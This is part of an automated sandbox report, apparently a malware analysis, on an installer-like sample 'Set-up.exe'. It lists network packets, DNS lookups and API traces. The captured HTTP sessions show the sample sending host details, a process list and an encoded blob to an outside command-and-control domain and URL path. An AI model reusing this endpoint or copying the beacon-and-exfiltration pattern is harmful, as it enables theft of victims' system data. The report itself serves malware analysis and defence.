Jan 5, 2025 17:56:15.250070095 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.250092030 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.250099897 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.250124931 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:18.129342079 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:18.129837990 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:18.134864092 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:18.134978056 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:18.851120949 CET	49792	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:18.856010914 CET	80	49792	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:18.856090069 CET	49792	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:18.856364965 CET	49792	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:18.861125946 CET	80	49792	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:19.470024109 CET	80	49792	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:19.470421076 CET	49792	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:19.475420952 CET	80	49792	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:19.475476027 CET	49792	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:19.500685930 CET	49797	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:19.505494118 CET	53	49797	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:19.505585909 CET	49797	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:19.505830050 CET	49797	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:19.510598898 CET	53	49797	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:20.722734928 CET	53	49797	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:20.724042892 CET	49797	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:20.724266052 CET	49804	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:20.729090929 CET	80	49804	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:20.729106903 CET	53	49797	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:20.729195118 CET	49797	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:20.729257107 CET	49804	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:20.729485989 CET	49804	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:20.734219074 CET	80	49804	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:21.509428024 CET	80	49804	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:21.513115883 CET	49804	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:21.518214941 CET	80	49804	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:21.518492937 CET	49804	80	192.168.2.6	34.147.147.173

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 17:55:58.856940031 CET	56728	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:55:58.857048035 CET	56728	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:55:58.863498926 CET	53	56728	1.1.1.1	192.168.2.6
Jan 5, 2025 17:55:58.863979101 CET	53	56728	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:13.972634077 CET	53849	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:13.972806931 CET	53849	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:14.759746075 CET	53	53849	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:14.766011000 CET	53	53849	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:18.165039062 CET	63139	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:18.165101051 CET	63139	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:18.604943991 CET	53	63139	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:18.850276947 CET	53	63139	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:19.492708921 CET	63141	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:19.492757082 CET	63141	53	192.168.2.6	1.1.1.1
Jan 5, 2025 17:56:19.499388933 CET	53	63141	1.1.1.1	192.168.2.6
Jan 5, 2025 17:56:20.184905052 CET	53	63141	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 17:55:58.856940031 CET	192.168.2.6	1.1.1.1	0xb9ae	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:55:58.857048035 CET	192.168.2.6	1.1.1.1	0xc38a	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Jan 5, 2025 17:56:13.972634077 CET	192.168.2.6	1.1.1.1	0x2297	Standard query (0)	home.thirttj13vs.top	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:56:13.972806931 CET	192.168.2.6	1.1.1.1	0x57b7	Standard query (0)	home.thirttj13vs.top	28	IN (0x0001)	false
Jan 5, 2025 17:56:18.165039062 CET	192.168.2.6	1.1.1.1	0x1dda	Standard query (0)	home.thirttj13vs.top	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:56:18.165101051 CET	192.168.2.6	1.1.1.1	0x50ea	Standard query (0)	home.thirttj13vs.top	28	IN (0x0001)	false
Jan 5, 2025 17:56:19.492708921 CET	192.168.2.6	1.1.1.1	0x8779	Standard query (0)	home.thirttj13vs.top	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:56:19.492757082 CET	192.168.2.6	1.1.1.1	0x79cc	Standard query (0)	home.thirttj13vs.top	28	IN (0x0001)	false
Jan 5, 2025 17:56:19.505830050 CET	192.168.2.6	1.1.1.1	0x79cc	Standard query (0)	home.thirttj13vs.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 17:55:58.863979101 CET	1.1.1.1	192.168.2.6	0xb9ae	No error (0)	httpbin.org	50.19.58.113	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:55:58.863979101 CET	1.1.1.1	192.168.2.6	0xb9ae	No error (0)	httpbin.org	34.197.122.172	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:55:58.863979101 CET	1.1.1.1	192.168.2.6	0xb9ae	No error (0)	httpbin.org	34.200.57.114	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:55:58.863979101 CET	1.1.1.1	192.168.2.6	0xb9ae	No error (0)	httpbin.org	3.210.94.60	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:56:14.759746075 CET	1.1.1.1	192.168.2.6	0x2297	No error (0)	home.thirttj13vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:56:18.604943991 CET	1.1.1.1	192.168.2.6	0x1dda	No error (0)	home.thirttj13vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Jan 5, 2025 17:56:20.184905052 CET	1.1.1.1	192.168.2.6	0x8779	No error (0)	home.thirttj13vs.top	34.147.147.173	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.thirttj13vs.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49759	34.147.147.173	80	1708	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 17:56:14.773277044 CET	12360	OUT	POST /KQOoGKPKGzBeuSFZKvBJ1736042467 HTTP/1.1 Host: home.thirttj13vs.top Accept: / Content-Type: application/json Content-Length: 578216 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 39 36 36 34 39 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001966495", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
Jan 5, 2025 17:56:14.778244972 CET	4944	OUT	Data Raw: 32 75 63 53 4e 46 6f 6e 69 32 44 5c 2f 68 44 4e 5a 6c 66 4f 36 4b 33 74 4e 51 6b 75 74 55 38 49 7a 4b 71 5a 52 37 37 56 5c 2f 45 58 68 73 53 53 4b 47 57 79 6a 45 67 53 50 7a 63 6b 38 5a 4f 43 73 30 61 68 69 4b 2b 50 79 4f 55 32 76 5a 5c 2f 32 31 Data Ascii: 2ucSNFoni2D\/hDNZlfO6K3tNQkutU8IzKqZR77V\/EXhsSSKGWyjEgSPzck8ZOCs0ahiK+PyOU2vZ\/21hYUqMl1nPF4GvmGCw0ErNzxmJw6trryy5fez7wC8QsljKeGw+W8Rwpq9X\/V\/GVK1eL+zCngczwuV5hi6ktVGGBwmKldWaTlHm+O6K7nxl8M\/iB8PniHjPwjrmgW9zKYbHU7yykfRNUcJ5hOja\/befousxhMt5
Jan 5, 2025 17:56:14.778310061 CET	4944	OUT	Data Raw: 2f 38 41 43 6b 5c 2f 67 7a 5c 2f 30 53 50 34 59 5c 2f 2b 45 46 34 56 5c 2f 38 41 6c 56 52 5c 2f 77 70 50 34 4d 5c 2f 38 41 52 49 5c 2f 68 6a 5c 2f 34 51 58 68 58 5c 2f 41 4f 56 56 65 6e 55 55 41 65 59 5c 2f 38 4b 54 2b 44 50 38 41 30 53 50 34 59 Data Ascii: /8ACk\/gz\/0SP4Y\/+EF4V\/8AlVR\/wpP4M\/8ARI\/hj\/4QXhX\/AOVVenUUAeY\/8KT+DP8A0SP4Y\/8AhBeFf\/lVR\/wpP4M\/9Ej+GP8A4QXhX\/5VV6dRQB5j\/wAKT+DP\/RI\/hj\/4QXhX\/wCVVH\/Ck\/gz\/wBEj+GP\/hBeFf8A5VV6dXKeOfCv\/Cb+EPEPhMeI\/FXg+XXdMuLG28V+B9YbQfF3hu8cB7
Jan 5, 2025 17:56:14.778331041 CET	4944	OUT	Data Raw: 4d 76 68 56 34 36 76 72 75 37 73 4c 7a 62 72 73 64 70 61 47 46 76 2b 55 48 77 56 77 4b 34 6b 34 38 34 38 34 66 78 6d 4b 77 54 79 79 68 51 7a 48 4e 31 67 73 31 56 57 70 6c 30 73 66 44 50 73 4a 67 61 4e 5a 63 32 46 78 57 41 77 6d 49 66 31 7a 32 4b Data Ascii: MvhV46vru7sLzbrsdpaGFv+UHwVwK4k48484fxmKwTyyhQzHN1gs1VWpl0sfDPsJgaNZc2FxWAwmIf1z2KxmYPCYNKcYV8Um6UZf8AXTmXEuacG8OcIZ9kmIzvL80q4fAZdHMOHcZLA5rRwlXJ54rEQjUw+NwWYYmh7PDSnUwmWrF4yooycMJOMako4mp\/sqW2l2b6j8OPjb8e\/Ct\/5du+if8ACR\/FbxZ8ZfDcV48if2bFr
Jan 5, 2025 17:56:14.778433084 CET	4944	OUT	Data Raw: 71 30 79 35 34 50 42 46 51 73 75 4f 44 79 44 51 41 78 5c 2f 75 6e 38 50 35 69 6d 50 31 5c 2f 44 2b 70 71 57 6d 73 75 37 48 62 46 42 70 54 36 5c 2f 49 68 71 48 6e 37 6e 76 5c 2f 6e 38 4f 5c 2f 77 43 74 54 55 7a 62 38 2b 5c 2f 32 78 5c 2f 6e 2b 64 Data Ascii: q0y54PBFQsuODyDQAx\/un8P5imP1\/D+pqWmsu7HbFBpT6\/IhqHn7nv\/n8O\/wCtTUzb8+\/2x\/n+dBoRVXqxRQdBXr7H\/wCCe\/8Ayev+zX\/2U\/R\/\/RN3XxxX2R\/wT35\/bX\/ZsP8A1U\/Rz\/5Cuv8AGvznxh\/5NJ4pf9m543\/9ZnMz9N8H\/wDk7Xhd\/wBnF4J\/9aXLD+5Ciiiv8FT\/AHjCiiigD428a
Jan 5, 2025 17:56:14.778598070 CET	4944	OUT	Data Raw: 6c 38 49 75 4b 4f 45 73 67 77 47 56 31 38 35 70 38 57 59 6e 43 55 70 78 71 35 6a 79 66 55 63 52 58 35 71 31 53 72 47 4d 63 4a 57 71 56 49 55 71 47 48 68 4f 4f 48 77 31 47 47 4c 72 4f 46 43 6a 54 68 47 79 55 59 72 35 52 5c 2f 61 47 76 5c 2f 4a 38 Data Ascii: l8IuKOEsgwGV185p8WYnCUpxq5jyfUcRX5q1SrGMcJWqVIUqGHhOOHw1GGLrOFCjThGyUYr5R\/aGv\/J8L6Pp6sQ19rQnYDGGhsbO4Dqc8\/666t347oOccH4\/27eMY7+tfRP7RWq2lx4g0LRre\/sbyTTNPu7mcWV1FdLFLqFykJjkaFnEcoXTkZoZAkqKyMyhXQn52r\/TD6POCo4Xwn4cxFKUJ\/2rPMs0nOm1KM1iMxxN
Jan 5, 2025 17:56:14.783171892 CET	7416	OUT	Data Raw: 4f 5c 2f 34 45 66 35 5c 2f 47 67 30 70 39 66 6c 2b 70 42 73 48 76 38 41 35 5c 2f 43 6f 71 73 56 48 4a 32 5c 2f 47 67 30 4b 5c 2f 6c 2b 5c 2f 36 66 5c 2f 58 71 4f 72 46 4e 66 37 70 5c 2f 44 2b 59 6f 4f 69 6e 55 33 30 5c 2f 72 75 76 36 37 61 6b 4e Data Ascii: O\/4Ef5\/Gg0p9fl+pBsHv8A5\/CoqsVHJ2\/Gg0K\/l+\/6f\/XqOrFNf7p\/D+YoOinU30\/ruv67akNQ4P8Ad\/8AQv8AGpqKjkXn\/XyOgr0zun0P8qfRS9n5\/h\/wQIn6\/h\/U0ypJO341HWht7Xzl\/XzKsvf\/AHv8ab5fzP16\/h\/kf5xVyq9B1ETpt\/lzTKsVXoCl9n5\/qR+X7\/p\/9eo6sVHJ2\/Gg6Cq0f
Jan 5, 2025 17:56:14.783329010 CET	7416	OUT	Data Raw: 52 36 78 63 65 47 64 44 31 4c 56 37 71 37 30 7a 53 39 49 38 54 36 62 63 57 48 69 72 52 35 74 4c 30 36 53 31 73 37 51 61 66 72 33 39 6e 32 54 32 6b 48 32 61 7a 61 47 46 49 7a 2b 56 6d 67 65 4f 62 58 58 64 42 48 69 47 43 35 38 4d 57 64 72 46 2b 7a Data Ascii: R6xceGdD1LV7q70zS9I8T6bcWHirR5tL06S1s7Qafr39n2T2kH2azaGFIz+VmgeObXXdBHiGC58MWdrF+zn4t\/advNO1HXdTg1yz+H3gv9pq5\/ZO1nTprGLwvPa\/8JV\/wtW1m+y2P9ojSZNBR7ufXLbVANGPdeGodT8YWPgDUfDn\/CPXUPxF+JPxA+GelRX\/AIki0NtEu\/hX8O\/CPxW+IXjLxjqesWNl4W8LfDnwj4D
Jan 5, 2025 17:56:14.826034069 CET	34608	OUT	Data Raw: 44 2b 51 6f 41 71 30 56 4d 5c 2f 77 42 30 5c 2f 68 5c 2f 4d 55 7a 62 38 75 65 5c 2f 58 38 50 38 41 50 50 36 56 30 48 51 4d 71 46 5c 2f 76 48 38 50 35 43 70 71 4b 41 4b 39 46 50 32 48 32 5c 2f 77 41 5c 2f 68 54 53 70 58 5c 2f 36 31 42 30 43 56 58 Data Ascii: D+QoAq0VM\/wB0\/h\/MUzb8ue\/X8P8APP6V0HQMqF\/vH8P5CpqKAK9FP2H2\/wA\/hTSpX\/61B0CVXqxUJ6v+P\/oQoNKfX5fqNqvViig0Km35s9uv4\/55\/SoqtyL9z25+uOKZQdBVf7p\/D+YqGrWxvT+X+NGxvT+X+NBfO\/L+vmUMP7\/n\/wDXpfL9\/wBP\/r1YkV+w+n+Pv7df51HQaleipX6fj\/Q0zlD25H+f
Jan 5, 2025 17:56:14.874011993 CET	1236	OUT	Data Raw: 33 54 35 66 76 38 41 70 5c 2f 38 41 58 71 53 69 69 76 38 41 70 46 50 2b 44 4d 72 30 56 4a 35 66 76 2b 6e 5c 2f 41 4e 65 6a 79 5c 2f 66 39 50 5c 2f 72 30 48 51 66 32 55 5c 2f 44 69 44 54 6d 38 45 2b 41 37 6d 2b 30 72 54 74 52 4d 48 68 50 77 34 79 Data Ascii: 3T5fv8Ap\/8AXqSiiv8ApFP+DMr0VJ5fv+n\/ANejy\/f9P\/r0HQf2U\/DiDTm8E+A7m+0rTtRMHhPw4yfbLWKWWPbpNocwXBQzwHkgiNwrqWSRXUlag+I\/wZ8deKrmz8UfDz4maZ8ObBtKVLjQNV+E\/gnxt4WkmjeRzqE1zpyeCvHVtcFWKXif8JLPpixwJJaCwZ55ZJPADbfh\/wCCf+xS8O\/+mi0x\/n2rY1H4weM\/B
Jan 5, 2025 17:56:14.922100067 CET	1236	OUT	Data Raw: 68 72 62 39 6d 54 50 5c 2f 5a 65 66 68 58 5c 2f 41 50 4e 58 55 44 66 74 72 66 73 62 63 44 5c 2f 68 72 58 39 6d 55 67 44 48 5c 2f 4a 65 66 68 5a 31 50 5c 2f 63 31 2b 37 66 68 58 69 33 77 76 2b 50 33 77 37 5c 2f 5a 6c 5c 2f 77 43 43 62 58 37 4f 5c Data Ascii: hrb9mTP\/ZefhX\/APNXUDftrfsbcD\/hrX9mUgDH\/JefhZ1P\/c1+7fhXi3wv+P3w7\/Zl\/wCCbX7O\/wAZPidqhsPDXhT9lf4ESR2kDQtq3iHWp\/hV4Wj0fwv4etJpYlvdd1y8CWllC0kUECmbUNQns9Lsb6+tvpb4DfHz4dftG\/B\/wn8avh1q0d14S8U6Wb6RbuSCG\/8ADuoWgMWuaB4hiWV4rDV9AvI57LUYzK8B8
Jan 5, 2025 17:56:18.129342079 CET	138	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Sun, 05 Jan 2025 16:56:18 GMT content-type: text/html; charset=utf-8 content-length: 1 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49792	34.147.147.173	80	1708	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 17:56:18.856364965 CET	100	OUT	GET /KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0 HTTP/1.1 Host: home.thirttj13vs.top Accept: /
Jan 5, 2025 17:56:19.470024109 CET	353	IN	HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Sun, 05 Jan 2025 16:56:19 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49804	34.147.147.173	80	1708	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 17:56:20.729485989 CET	173	OUT	POST /KQOoGKPKGzBeuSFZKvBJ1736042467 HTTP/1.1 Host: home.thirttj13vs.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Jan 5, 2025 17:56:21.509428024 CET	353	IN	HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Sun, 05 Jan 2025 16:56:21 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	50.19.58.113	443	1708	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:55:59 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2025-01-05 16:55:59 UTC	224	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:55:59 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2025-01-05 16:55:59 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	11:55:57
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x1d0000
File size:	8'022'664 bytes
MD5 hash:	91DB00CCDEF85A8AE22EE3B8DF68ECA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	37.3%
Total number of Nodes:	1216
Total number of Limit Nodes:	66

Executed Functions

Function 0020A550 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 777networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 001ED8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001E01B1), ref: 001ED8E2

setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0020A670
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A6A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A6AB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A6AF

Part of subcall function 001ED090: GetLastError.KERNEL32 ref: 001ED0A1
Part of subcall function 001ED090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001ED0A9
Part of subcall function 001ED090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001ED0CD
Part of subcall function 001ED090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001ED0D7
Part of subcall function 001ED090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 001ED381
Part of subcall function 001ED090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 001ED3A2
Part of subcall function 001ED090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001ED3BF
Part of subcall function 001ED090: GetLastError.KERNEL32 ref: 001ED3C9
Part of subcall function 001ED090: SetLastError.KERNEL32(00000000), ref: 001ED3D4

Part of subcall function 00214F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00214F9E

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0020A831
WSAGetLastError.WS2_32 ref: 0020A854
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0020A97A
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0020A9A6
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0020AB0F
htons.WS2_32(?), ref: 0020AC01
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0020AC38
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0020AC64
WSAGetLastError.WS2_32 ref: 0020ACDC
WSAGetLastError.WS2_32 ref: 0020ADF5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0020AE9D
htons.WS2_32(?), ref: 0020AEDB
bind.WS2_32(?,00000002,00000010), ref: 0020AEF5
WSAGetLastError.WS2_32 ref: 0020AFB9
htons.WS2_32(?), ref: 0020AFFC
bind.WS2_32(?,?,?), ref: 0020B014
WSAGetLastError.WS2_32 ref: 0020B056
htons.WS2_32(?), ref: 0020B0D2
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0020B0EA

Strings

Trying [%s]:%d..., xrefs: 0020A689
Local Interface %s is ip %s using address family %i, xrefs: 0020AE60
Bind to local port %d failed, trying next, xrefs: 0020AFE5
Trying %s:%d..., xrefs: 0020A7C2, 0020A7DE
Local port: %hu, xrefs: 0020AF28
cf_socket_open() -> %d, fd=%d, xrefs: 0020A796
@, xrefs: 0020AC42
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0020A6CE
Couldn't bind to '%s' with errno %d: %s, xrefs: 0020AE1F
Could not set TCP_NODELAY: %s, xrefs: 0020A871
cf-socket.c, xrefs: 0020A5CD, 0020A735
Name '%s' family %i resolved to '%s' family %i, xrefs: 0020ADAC
bind failed with errno %d: %s, xrefs: 0020B080
@, xrefs: 0020A8F4
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0020AD0A

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
